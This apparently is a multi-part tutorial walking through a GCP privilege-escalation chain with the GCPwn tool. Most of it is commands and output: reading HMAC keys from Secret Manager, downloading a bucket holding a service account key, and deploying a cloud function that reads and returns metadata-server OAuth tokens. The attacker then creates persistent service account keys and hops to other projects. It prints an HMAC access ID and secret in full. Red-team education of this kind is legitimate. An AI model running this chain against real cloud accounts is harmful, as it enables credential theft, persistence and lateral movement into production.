> cat GatheredData/1_cool_pentesting_workspace/SecretManager/secrets_data_file.csv                                                              

secret_project_id,secret_name_version,secret_value_data 

staging-project-1-426001,ServiceAccountHMACKeys-388372 (Version: 1),b'${secret_hmac_key}' 

staging-project-1-426001,ServiceAccountHMACKeys-388372 (Version: 2),b'{secret_hmac_key}' 

staging-project-1-426001,ServiceAccountHMACKeys-388372 (Version: 3),b' bucket-accessor@staging-project-1-426001.iam.gserviceaccount.com\nGOOG1ELRQCDB33CEMAVFSAR6XOUDNYEV6GJDKKTCHJ3WNX5FLLP3C25DJRDAV\ntxyzyeg3H/F79ARUP1YxF0CoZAjeUreTytd++icK' 

staging-project-1-426001,ServiceAccountHMACKeys-388372 (Version: 4),"b""Why are we putting service account keys in buckets and then HMAC keys in here? Let's brainstorm a better solution Monday. Adding a secret version to overwrite previous values so no one will see it.""" 

staging-project-1-426001,ServiceAccountHMACKeys-388372 (Version: latest),"b""Why are we putting service account keys in buckets and then HMAC keys in here? Let's brainstorm a better solution Monday. Adding a secret version to overwrite previous values so no one will see it.""" 

Step 6: Download Bucket Content with HMAC Keys 

Great! We have the HMAC keys but now what? How do we use these to make SIgV4 requests? Luckily, gcpwn already has this feature built into enum_buckets per the “–access-id” and “–hmac-secret” flags for both listing and downloading buckets/blobs. Running the module with these values will send SigV4 requests to the Cloud Storage XML API for downloading bucket contents. Because it’s SigV4 and it was a struggle to make in vanilla python, it will actually send AWS headers as part of these requests to GCP endpoints just to align with SigV4 standards. The request still targets GCP buckets and ideally these will switch to google headers in a future update. Running our module, you will notice blobs are now listed under the “service-account-details-2323232” bucket successfully. 

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> modules run enum_buckets -h 

usage: main.py [-h] [--buckets BUCKETS | --bucket-file BUCKET_FILE] [--blobs BLOBS | --blob-file BLOB_FILE] [--download] [--output OUTPUT] [--file-size FILE_SIZE] [--good-regex GOOD_REGEX] [--time-limit TIME_LIMIT] [--external-curl] [--iam] [--minimal-calls] [--access-id ACCESS_ID] [--hmac-secret HMAC_SECRET] [--list-hmac-secrets] [--validate-buckets] [--txt TXT] [-v] 

Enumerate Buckets Options 

options: 

  -h, --help            show this help message and exit 

  --buckets BUCKETS     Bucket names to proceed with in the format '--buckets bucket1,bucket2,bucket3' 

[TRUNCATED] 

  --download            Attempt to download all blobs enumerated 

  --output OUTPUT       Output folder for downloading files 

[TRUNCATED] 

  --access-id ACCESS_ID Access ID for HMAC key to use in Request 

  --hmac-secret HMAC_SECRET HMAC Secret to use when making API call 

[TRUNCATED] 

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> modules run enum_buckets --access-id GOOG1ELRQCDB33CEMAVFSAR6XOUDNYEV6GJDKKTCHJ3WNX5FLLP3C25DJRDAV --hmac-secret txyzyeg3H/F79ARUP1YxF0CoZAjeUreTytd++icK --buckets service-account-details-2323232 --download 

> Do you want to scan all projects or current single project? If not specify a project-id(s) with '--project-ids project1,project2,project3' 

>> [1] All Projects 

>> [2] Current/Single 

> [3] Exit 

> Choose an option: 2 

[*] Proceeding with just the current project ID 

[*]-------------------------------------------------------------------------------------------------------[*] 

[*] Checking staging-project-1-426001 for buckets/blobs via LIST buckets... 

[**] Reviewing service-account-details-2323232 

[***] LIST Bucket Blobs 

[***] DOWNLOAD Bucket Blobs 

[SUMMARY] GCPwn found 1 Buckets (with up to 10 blobs shown each) in staging-project-1-426001 

- service-account-details-2323232 

  - note.txt 

  - staging-project-1-426001-da65b2807066.json 

*See all blobs with 'data tables cloudstorage-bucketblobs --columns bucket_name,name [--csv filename]' 

[*]-------------------------------------------------------------------------------------------------------[*]

If we check GatheredData we will see the bucket files were successfully downloaded using the HMAC for SigV4 via the XML Storage API. Going into these files we can see we have a service account key, and a corresponding note. 

> tree GatheredData                                                                

GatheredData 

└── 1_cool_pentesting_workspace 

    ├── SecretManager 

    │   └── secrets_data_file.csv 

    └── Storage 

        ├── REST 

        │   └── staging-project-1-426001 

        │       └── old-development-bucket-9282734 

        │           └── my_staging_service_key.json 

        └── XML 

            └── staging-project-1-426001 

                └── service-account-details-2323232 

                    ├── note.txt 

                    └── staging-project-1-426001-da65b2807066.json 

>  cat staging-project-1-426001-da65b2807066.json  

{ 

  "type": "service_account", 

  "project_id": "staging-project-1-426001", 

  "private_key_id": "da65b2[REDACTED]", 

  "private_key": "-----BEGIN PRIVATE KEY-----\nMIIEvQIBADANBgkq[REDACTED]\n-----END PRIVATE KEY-----\n", 

  "client_email": "deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com", 

  "client_id": "10251[REDACTED]", 

  "auth_uri": "https://accounts.google.com/o/oauth2/auth", 

  "token_uri": "https://oauth2.googleapis.com/token", 

  "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs", 

  "client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/deployer-service-account%40staging-project-1-426001.iam.gserviceaccount.com", 

  "universe_domain": "googleapis.com" 

} 

> cat note.txt                                    

Hey mark. We are still working on getting deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com working. I modeled it just like production so it should be able to create cloud functions. I was even testing it on the service account I've used in other projects: testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com. I've used it in "production-project-1-426001" and "testbench-426001" successfully but still running into issues. 

To end this process, let’s add our newly discovered service account key to gcpwn. Note we are resuming the tool below which shows the credentials we have already added in case we wanted to resume those instead of adding new creds. 

> python3 main.py 

[*] Found existing sessions: 

  [0] New session 

  [1] cool_pentesting_workspace 

  [2] exit 

Choose an option: 1 

[TRUNCATED] 

[*] Listing existing credentials... 

  [1] leaked_adc_dev_creds (adc) - fwdcloudsec2233@gmail.com 

  [2] my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192 (service) - my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com 

Submit the name or index of an existing credential from above, or add NEW credentials via Application Default Credentails (adc - google.auth.default()), a file pointing to adc credentials, a standalone OAuth2 Token, or Service credentials. See wiki for details on each. To proceed with no credentials just hit ENTER and submit an empty string.  

[1] *adc      <credential_name> [tokeninfo]                    (ex. adc mydefaultcreds [tokeninfo])  

[2] *adc-file <credential_name> <filepath> [tokeninfo]         (ex. adc-file mydefaultcreds /tmp/name2.json) 

[3] *oauth2   <credential_name> <token_value> [tokeninfo]      (ex. oauth2 mydefaultcreds ya[TRUNCATED]i3jJK)   

[4] service   <credential_name> <filepath_to_service_creds>    (ex. service mydefaultcreds /tmp/name2.json) 

[TRUNCATED] 

Input: service deployer_service_account /home/kali/Downloads/staging-project-1-426001-da65b2807066.json 

[*] Credentials successfuly added 

Loading in Service Credentials... 

[*] Loaded credentials deployer_service_account 

(staging-project-1-426001:deployer_service_account)> creds info 

Summary for deployer_service_account: 

Email: deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com 

Scopes: 

    - N/A 

Default Project: staging-project-1-426001 

All Projects: 

    - my-private-test-project-430102 

    - staging-project-1-426001 

Access Token: N/A 

Final Notes

This concludes Part 2 of the sample exploit scenario. Part 3 picks up from where this leaves off and demonstrates a few additional exploit modules. As you use the tool feel free to add issues/pull requests as you run into bugs as the tool continues to be refactored/improved.

Part 3

Having covered several modules in Part 2 regarding cloud storage and secrets manager, I will finish the exploit scenario in this part with modules involving cloud functions and implicit delegation. Note I presented a similar scenario at fwd:cloudsec 2024 (https://www.youtube.com/watch?v=opvv9h3Qe0s&t=1006s) albeit with less modules shown 🙂  

This attack path will cover the following steps: 

  • Quick Overview of Next Steps: Create Cloud Function to Pivot to Attached SA  
  • Step 7: Create a Cloud Function and Query Metadata Endpoint 
  • Quick Overview of Next Steps: Creating Service Account Key 
  • Step 8: Review IAM Bindings & Add a Service Account Key for Current SA 
  • Quick Overview of Next Steps: Implicit Delegation Across Multiple Projects 
  • Step 9: Add New Projects and Enumerate 

Quick Overview of Next Steps: Create Cloud Function to Pivot to Attached SA  

Again, let’s take a quick pause and look at the diagram below. This will effectively cover what our next steps will be. Having just become deployer-service-account, we want to leverage our supposed ability to create cloud functions to pivot to the testbench-serviceaccount-multi service account. While not shown below, the deployer-service-account has iam.serviceAccounts.actAs permissions over testbench-serviceaccount-multi (not covered here in interest of brevity).  Using GCPwn we will create a function with the target service account attached and the source code being supplied by an attacker -controlled bucket in a completely different ecosystem (the hosted source code ZIP file is provided in GCPwn). We will then subsequently invoke the newly created V1 function with the GCPwn payload which returns the OAuth credentials for testbench-serviceaccount-multi which we will then use to swap to a new credential set. This would be a case of “standalone OAuth2” credentials. We can only use the standalone OAuth2 token for a given time before it expires, although we will fix that problem in the next step. 

Step 7: Create a Cloud Function and Query Metadata Endpoint 

Before we run any exploit functions, we will run “enum_all” as the new service account. By running enum_all, we can populate our gcpwn tables with data that will make it easier to run the exploit module later. Noticeably enumerating all data will pick up all the service accounts in the project, which will allow us to prompt for those service accounts later. 

(staging-project-1-426001:deployer_service_account)> modules run enum_all --iam 

[*]-------------------------------------------------------------------------------------------------------[*]

[***********] Beginning enumeration for staging-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*] 

[*] Beginning Enumeration of RESOURCE MANAGER Resources... 

[TRUNCATED] 

   - [staging-project-1-426001] GOOG1ELRQCDB33CEMAVFSAR6XOUDNYEV6GJDKKTCHJ3WNX5FLLP3C25DJRDAV - ACTIVE                                                                                             

     SA: bucket-accessor@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                          

[TRUNCATED] 

[*] Beginning Enumeration of IAM Resources... 

[*] Checking staging-project-1-426001 for service accounts... 

[SUMMARY] GCPwn found 5 Service Account(s) in staging-project-1-426001 

   - bucket-accessor@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                              

   - deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                     

   - my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                       

   - staging-project-1-426001@appspot.gserviceaccount.com                                                                                                                                          

   - testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com                                                                                                               

[*] Checking staging-project-1-426001 for roles... 

[**] GET on role projects/staging-project-1-426001/roles/CustomRole... 

[SUMMARY] GCPwn found 1 Custom Role(s) 

   - ListBucketsOnly (projects/staging-project-1-426001/roles/CustomRole)                                                                                                                          

[*] Checking IAM Policy for Organizations... 

[*] Checking IAM Policy for Folders... 

[*] Checking IAM Policy for Projects... 

[*] Checking IAM Policy for Buckets... 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[*] Checking IAM Policy for CloudFunctions... 

[*] Checking IAM Policy for Compute Instances... 

[*] Checking IAM Policy for Service Accounts... 

[*] Checking IAM Policy for Secrets... 

[***********] Ending enumeration for staging-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*] 

Having enumerated all the data, we will review the corresponding note from Part 2 Step 6 and highlight some interesting points: 

  • Supposedly deployer-service-account can create cloud functions.  
  • The author usually attaches service account “testbench-serviceaccount-multi” to the running function indicating we might have iam.serviceAccounts.actAs permissions over the service account (required to attach a service account to a function).  
  • The testbench-serviceaccount-multi service account is also used in multiple projects so a successful pivot to that service account might let us break out of our current project. 

Pulling back service account credentials via the GCP metadata endpoint within a cloud function is a known technique described [here](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/). To execute the attack in GCPwn we will leverage an exploit module, exploit_functions_invoke,  to create a V1 cloud function with the specified service account attached, invoke the function, parse the returned OAuth2 creds, and swap the current creds to the new service account credentials per the OAuth2 token.  

One prerequisite in creating a cloud function is to supply the function code via a file in a GCP bucket (“–bucket-src”). We as the attacker will have already set up a bucket with open permissions in a completely different ecosystem to point our newly created function to. The hosted payload is the ZIP file that comes with GCPwn if you wanted to also host it in a bucket. As shown below, the code returns the default token via the GCP metadata endpoint:

Codev1v2.zip Source Code: 

import requests 

def data_exfil(request): 

    res_email = requests.get('http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/email', headers={'Metadata-Flavor': 'Google'}) 

    res_token = requests.get('http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token', headers={'Metadata-Flavor': 'Google'}) 

    output_data = { 

        "email": res_email.text, 

        "token": res_token.text 

    } 

    return output_data 

With everything set up, let’s kick off the exploit. Note the only required flag is “–bucket-src”, and GCPwn will give us options for what service account to attach since we enumerated the service accounts earlier. We also pass in the “–create” and “–v1” flag to create a V1 function. Finally, “–invoke” will call the function while “–assume-creds” instructs GCPwn to become the OAuth2 creds token returned. 

(staging-project-1-426001:deployer_service_account)> modules run exploit_functions_invoke --bucket-src gs://attacker-controlled-bucket-used-to-host-payloads-33434/codev1v2.zip --v1 --create --invoke --assume-creds 

[*]-------------------------------------------------------------------------------------------------------[*]

> Provide the function name to create in the format projects/[project_id]/locations/[location_id]/functions/[function_name]? projects/staging-project-1-426001/locations/us-central1/functions/attacker-function 

> Do you want to specify a service role to attach on create/update? Note IF CREATING a function, the sdk will auto-attach the default editor sa of PROJECT_ID@appspot.gserviceaccount.com (v1) or PROJECT_NUMBER-compute@developer.gserviceaccount.com (v2) and can reply "n" to this question. [y/n] y 

> Choose an existing sa from those below to attach to the updated/created cloud function: 

>> [1] deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com, projects/staging-project-1-426001/serviceAccounts/deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com 

[TRUNCATED] 

>> [5] testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com, projects/staging-project-1-426001/serviceAccounts/testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com 

[TRUNCATED] 

> [7] Exit 

> Choose an option: 5 

[*] Waiting for V1 creation operation to complete, this might take some time... 

[*] Successfully created projects/staging-project-1-426001/locations/us-central1/functions/attacker-function 

[*] Response from function is: 

{"email":"testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com","token":"{\"access_token\":\"ya29.c.c0ASRK0GYmRcAoUtL7_c_13NS[RECATED]\",\"expires_in\":1799,\"token_type\":\"Bearer\"}"} 

[*] Project ID of credentials is: staging-project-1-426001 

[*] Credentials successfully added 

Loading in OAuth2 token. Note it might be expired based on how long its existed... 

[*] Loaded credentials testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC 

[*]-------------------------------------------------------------------------------------------------------[*]

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC)> creds info 

Summary for testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC: 

Email: testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com 

Scopes: 

    - N/A 

Default Project: staging-project-1-426001 

All Projects: 

    - my-private-test-project-430102 

    - staging-project-1-426001 

Access Token: ya29.c.c0ASRK0GYmRcAoUtL7_c_13NS[REDACTED] 

[*]-------------------------------------------------------------------------------------------------------[*]

As a peek behind the scenes here is our newly created function via the UI: 

Note the cloud functions exploit module is versatile. You can upload any arbitrary code you want or choose to just invoke existing functions without creating/updating anything.  This is useful if you just want to invoke the function you just created at a later time instead of having to make a brand new function with each run. This only-invoke feature is shown below where we get the function name via the corresponding data tables command (if you didn’t want to copy/paste 🙂 ) and run that through the exploit script with the “—invoke” tag. 

(staging-project-1-426001:deployer_service_account)> data tables cloudfunctions-functions --columns namename 

projects/staging-project-1-426001/locations/us-central1/functions/attacker-function 

(staging-project-1-426001:deployer_service_account)> modules run exploit_functions_invoke --invoke --function-name projects/staging-project-1-426001/locations/us-central1/functions/attacker-function --v1 

[*]-------------------------------------------------------------------------------------------------------[*]

[*] Response from function is: 

{"email":"testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com","token":"{\"access_token\":\"ya29.c.c0ASRK0GYmRcAoUtL7_c_13N[REDACTED]\",\"expires_in\":1243,\"token_type\":\"Bearer\"}"} 

[*]-------------------------------------------------------------------------------------------------------[*]

One final note but Cloud Functions V2 doesn’t have a function to invoke it in the SDK, only for V1. Thus, it’s usually easier to do everything in Cloud Functions V1. However, if you want/need to use V2 the tool does support that, I just do some manual python requests calls. 

Quick Overview of Next Steps: Creating Service Account Key  

Again, let’s take a quick pause and look at the diagram below. This will effectively cover what our next steps will be. Having just got the OAuth token for testbench-serviceaccount-multi, we know the token will expire in a finite amount of time. We could keep invoking the cloud function attacker-function and updating the OAuth2 token, but this service account has the viewer role on the project meaning we can see all the IAM policies in the project. By enumerating everything and checking the policies, we will see that testbench-serviceaccount-multi has permissions to create service account keys on testbench-serviceaccount-multi (yep, on itself). Armed with this knowledge we will make a service account key for testbench-serviceaccount-multi for easier stability. 

Step 8: Review IAM Bindings & Add a Service Account Key for Current SA 

While getting an OAuth2 token for testbench-serviceaccount-multi is great and would let us proceed, we are on a bit of a time crunch as the OAuth2 token will expire. We could just keep invoking our function and running `creds update` to update our `OAuth token`, but lets see what permissions we have. The last step in enum_all is enum_policy_bindings which will try to grab all the policy bindings on all data enumerated thus far. We will run enum_all and see if the module was able to gather any policy bindings for later use.

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC)> modules run enum_all --iam 

> Do you want to scan all projects or current single project? If not specify a project-id(s) with '--project-ids project1,project2,project3' 

>> [1] All Projects 

>> [2] Current/Single 

> [3] Exit 

> Choose an option: 2 

[*] Proceeding with just the current project ID 

[*]-------------------------------------------------------------------------------------------------------[*] 

[***********] Beginning enumeration for staging-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

[*] Beginning Enumeration of RESOURCE MANAGER Resources... 

[*] Searching Organizations 

[*] Searching All Projects 

[TRUNCATED] 

[*] Checking staging-project-1-426001 for roles... 

[**] GET on role projects/staging-project-1-426001/roles/CustomRole... 

[SUMMARY] GCPwn found 1 Custom Role(s) 

   - ListBucketsOnly (projects/staging-project-1-426001/roles/CustomRole)                                                                                                                       

[*] Checking IAM Policy for Organizations... 

[*] Checking IAM Policy for Folders... 

[*] Checking IAM Policy for Projects... 

[*] Checking IAM Policy for Buckets... 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[*] Checking IAM Policy for CloudFunctions... 

[*] Checking IAM Policy for Compute Instances... 

[*] Checking IAM Policy for Service Accounts... 

[*] Checking IAM Policy for Secrets... 

[***********] Ending enumeration for staging-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

To check if our module was successful, we can run `creds info` and check if any getIamPolicy permissions were added. In this case it looks like they were as seen by the service account permissions: 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC)> creds info 

Summary for testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC: 

Email: testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com 

Scopes: 

    - N/A 

Default Project: staging-project-1-426001 

All Projects: 

    - my-private-test-project-430102 

    - staging-project-1-426001 

Access Token: ya29.c.c0ASRK0GYmRcAoUtL7_c_13N[REDACTED] 

[******] Permission Summary for testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC [******] 

[TRUNCATED] 

- Service Account Actions Allowed Permissions 

  - staging-project-1-426001 

     [TRUNCATED] 

    - iam.serviceAccounts.getIamPolicy 

      - 239052134916-compute@developer.gserviceaccount.com (service account) 

      - bucket-accessor@staging-project-1-426001.iam.gserviceaccount.com (service account) 

      - deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com (service account) 

      - my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com (service account) 

     [TRUNCATED] 

      - staging-project-1-426001@appspot.gserviceaccount.com (service account) 

      - testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com (service account) 

[TRUNCATED] 

Note we could have also just enum_service_accounts as shown below if we wanted to be more granular 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC)> modules run enum_service_accounts --iam 

> Do you want to scan all projects or current single project? If not specify a project-id(s) with '--project-ids project1,project2,project3' 

>> [1] All Projects 

>> [2] Current/Single 

> [3] Exit 

> Choose an option: 2 

[*] Proceeding with just the current project ID 

[*]-------------------------------------------------------------------------------------------------------[*]

[*] Checking staging-project-1-426001 for service accounts... 

[SUMMARY] GCPwn found 6 Service Account(s) in staging-project-1-426001 

   - 239052134916-compute@developer.gserviceaccount.com                                                                                                                                         

   - bucket-accessor@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                           

   - deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                  

   - my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                    

   - staging-project-1-426001@appspot.gserviceaccount.com                                                                                                                                       

   - testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com                                                                                                            

[*]-------------------------------------------------------------------------------------------------------[*]

At this point, we will run the process_iam_bindings module to get a nice summary review of any IAM policy bindings that have been gathered thus far. Unlike creds info which shows you the granular permissions, process_iam_bindings returns a summary of the predefined/custom roles that it has identified per user which is sometimes easier to read. Note how running it below shows how the testbench-serviceaccount-multi  service account has the “roles/iam.serviceAccountKeyAdmin” role on the  testbench-serviceaccount-multi service account (itself). 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC)> modules run process_iam_bindings 

[*]-------------------------------------------------------------------------------------------------------[*]

 

[******] Summary for serviceAccount:deployer-service-account@staging-project-1-426001.iam.gserviceaccount.com [******] 

Service Accounts Summary 

  - "projects/staging-project-1-426001/serviceAccounts/testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com" (in staging-project-1-426001) 

    - roles/iam.serviceAccountUser 

[******] Summary for serviceAccount:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com [******] 

Secret Manager Summary 

  - "projects/239052134916/secrets/ServiceAccountHMACKeys-388372" (in staging-project-1-426001) 

    - roles/secretmanager.secretAccessor 

[******] Summary for serviceAccount:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com [******] 

Service Accounts Summary 

  - "projects/staging-project-1-426001/serviceAccounts/testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com" (in staging-project-1-426001) 

    - roles/iam.serviceAccountKeyAdmin 

[******] Summary for user:fwdcloudsec2233@gmail.com [******] 

Service Accounts Summary 

  - "projects/staging-project-1-426001/serviceAccounts/my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com" (in staging-project-1-426001) 

    - roles/iam.serviceAccountKeyAdmin 

[*]-------------------------------------------------------------------------------------------------------[*]

Since we have the specified role on ourselves, we can create our own service account key to maintain persistence over time as opposed to relying on the OAuth2 token. We will run exploit_service_account_keys and get a new credential set with a similar credential name with a different timestamp. 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_07212024_0355_UTC)> modules run exploit_service_account_keys --sa projects/staging-project-1-426001/serviceAccounts/testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com 

[*]-------------------------------------------------------------------------------------------------------[*]

> Do you want to create a new sa key or disable/enable an existing one? 

>> [1] CREATE 

>> [2] ENABLE 

>> [3] DISABLE 

> [4] Exit 

> Choose an option: 1 

> The key was successfully created. Do you want to try assuming the new credentials [y\n].y 

[*] Credentials successfuly added 

Loading in Service Credentials... 

[*] Loaded credentials testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_1721548959.0264788 

[*]-------------------------------------------------------------------------------------------------------[*]

Quick Overview of Next Steps: Implicit Delegation Across Multiple Projects 

Again, let’s take a quick pause and look at the diagram below. This will effectively cover what our next steps will be. At this point in time, we will look outside of our current project to other projects. The bucket that contained the note referencing testbench-serviceaccount-multi said the service account was used in other projects like “production-project-1-426001” and “testbench-426001”.  We will manually add those projects to GCPwn, run enumerate scripts on all the projects, process the resulting IAM bindings, and run an exploit module to leverage implicit delegation to hop to a service account in production.

Step 9: Add New Projects and Enumerate 

In the past steps we were running enum_all on our current project ID. However, the note that was in the same bucket as the earlier JSON key mentioned two other project IDs: “production-project-1-426001” and “testbench-426001”.  Per the note it sounds like testbench-serviceaccount-multi has permissions in those other projects. To test this theory, we will add those project IDs manually to GCPwn so that future modules can run against these project IDs when prompted. 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_1721548959.0264788)> projects 

[*] Current projects known for all credentials:  

  my-private-test-project-430102 

  staging-project-1-426001 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_1721548959.0264788)> projects add production-project-1-426001 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_1721548959.0264788)> projects add testbench-426001 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_1721548959.0264788)> projects 

[*] Current projects known for all credentials:  

  my-private-test-project-430102 

  staging-project-1-426001 

  production-project-1-426001 

  testbench-426001 

With the new projects added, let’s run enum_all on ALL project IDs known. Note this will include our original my-private-test-project-430102 project. To avoid this, you could run `projects rm <project_id>` or just pass in the “–project-ids” of the projects you want to run the module against. 

(staging-project-1-426001:testbench-serviceaccount-multi@staging-project-1-426001.iam.gserviceaccount.com_1721548959.0264788)> modules run enum_all --iam 

> Do you want to scan all projects or current single project? If not specify a project-id(s) with '--project-ids project1,project2,project3' 

>> [1] All Projects 

>> [2] Current/Single 

> [3] Exit 

 

> Choose an option: 1 

[*]-------------------------------------------------------------------------------------------------------[*]

[***********] Beginning enumeration for my-private-test-project-430102 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

[*] Beginning Enumeration of RESOURCE MANAGER Resources... 

[*] Searching Organizations 

[*] Searching All Projects 

[*] Searching All Folders 

[-] No organizations, projects, or folders were identified. You might be restricted with regard to projects. If you know fo a project name add it manually via 'projects add <project_name> from the main menu 

[*] Getting remainting projects/folders via recursive folder/project list calls starting with org node if possible 

[*] NOTE: This might take a while depending on the size of the domain 

[SUMMARY] GCPwn found or retrieved NO Organization(s) 

[SUMMARY] GCPwn found or retrieved NO Folder(s) 

[SUMMARY] GCPwn found or retrieved NO Project(s) 

[*] Beginning Enumeration of CLOUD COMPUTE Resources... 

[*] Checking my-private-test-project-430102 for instances... 

[X] STATUS 403: Compute API does not appear to be enabled for project my-private-test-project-430102 

[SUMMARY] GCPwn found or retrieved NO Compute Instance(s) in my-private-test-project-430102 

[*] Checking Cloud Compute Project my-private-test-project-430102... 

[X] STATUS 403: Compute API does not appear to be enabled for project my-private-test-project-430102 

[SUMMARY] GCPwn found or retrieved NO Compute Project(s) with potential metadata shown below. 

[*] Beginning Enumeration of CLOUD FUNCTION Resources... 

[*] Checking my-private-test-project-430102 for functions... 

[X] 403 The Cloud Functions API is not enabled for projects/my-private-test-project-430102/locations/- 

[SUMMARY] GCPwn found or retrieved NO Function(s) in my-private-test-project-430102 

[*] Beginning Enumeration of CLOUD STORAGE Resources... 

[X] 403: The user does not have storage.hmacKeys.list permissions on bucket 

[*] Checking my-private-test-project-430102 for HMAC keys... 

[SUMMARY] GCPwn found or retrieved NO HMAC Key(s) with corresponding service accounts (SAs) in my-private-test-project-430102 

[*] Checking my-private-test-project-430102 for buckets/blobs via LIST buckets... 

[X] The user does not have storage.buckets.list permissions on bucket 

[*] Beginning Enumeration of SECRETS MANAGER Resources... 

[*] Beginning Enumeration of IAM Resources... 

[*] Checking my-private-test-project-430102 for service accounts... 

[SUMMARY] GCPwn found or retrieved NO Service Account(s) in my-private-test-project-430102 

[*] Checking my-private-test-project-430102 for roles... 

[SUMMARY] GCPwn found or retrieved NO Custom Role(s) 

[***********] Ending enumeration for my-private-test-project-430102 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

[***********] Beginning enumeration for staging-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*]

[*] Beginning Enumeration of CLOUD COMPUTE Resources... 

[*] Checking staging-project-1-426001 for instances... 

[X] STATUS 403: Compute API does not appear to be enabled for project staging-project-1-426001 

[SUMMARY] GCPwn found or retrieved NO Compute Instance(s) in staging-project-1-426001 

[*] Checking Cloud Compute Project staging-project-1-426001... 

[X] STATUS 403: Compute API does not appear to be enabled for project staging-project-1-426001 

[SUMMARY] GCPwn found or retrieved NO Compute Project(s) with potential metadata shown below. 

[*] Beginning Enumeration of CLOUD FUNCTION Resources... 

[*] Checking staging-project-1-426001 for functions... 

[**] Reviewing projects/staging-project-1-426001/locations/us-central1/functions/attacker-function 

[***] GET Individual Function 

[***] TEST Function Permissions 

[SUMMARY] GCPwn found 1 Function(s) in staging-project-1-426001 

   - [us-central1] attacker-function                                                                                                                                                            

[*] Beginning Enumeration of CLOUD STORAGE Resources... 

[*] Checking staging-project-1-426001 for HMAC keys... 

[SUMMARY] GCPwn found 1 HMAC Key(s) with corresponding service accounts (SAs) in staging-project-1-426001 

   - [staging-project-1-426001] GOOG1ELRQCDB33CEMAVFSAR6XOUDNYEV6GJDKKTCHJ3WNX5FLLP3C25DJRDAV - ACTIVE                                                                                          

     SA: bucket-accessor@staging-project-1-426001.iam.gserviceaccount.com                                                                                                                       

[*] Checking staging-project-1-426001 for buckets/blobs via LIST buckets... 

[**] Reviewing gcf-sources-239052134916-us-central1 

[***] GET Bucket Object 

[***] TEST Bucket Permissions 

[***] LIST Bucket Blobs 

[***] GET Bucket Blobs 

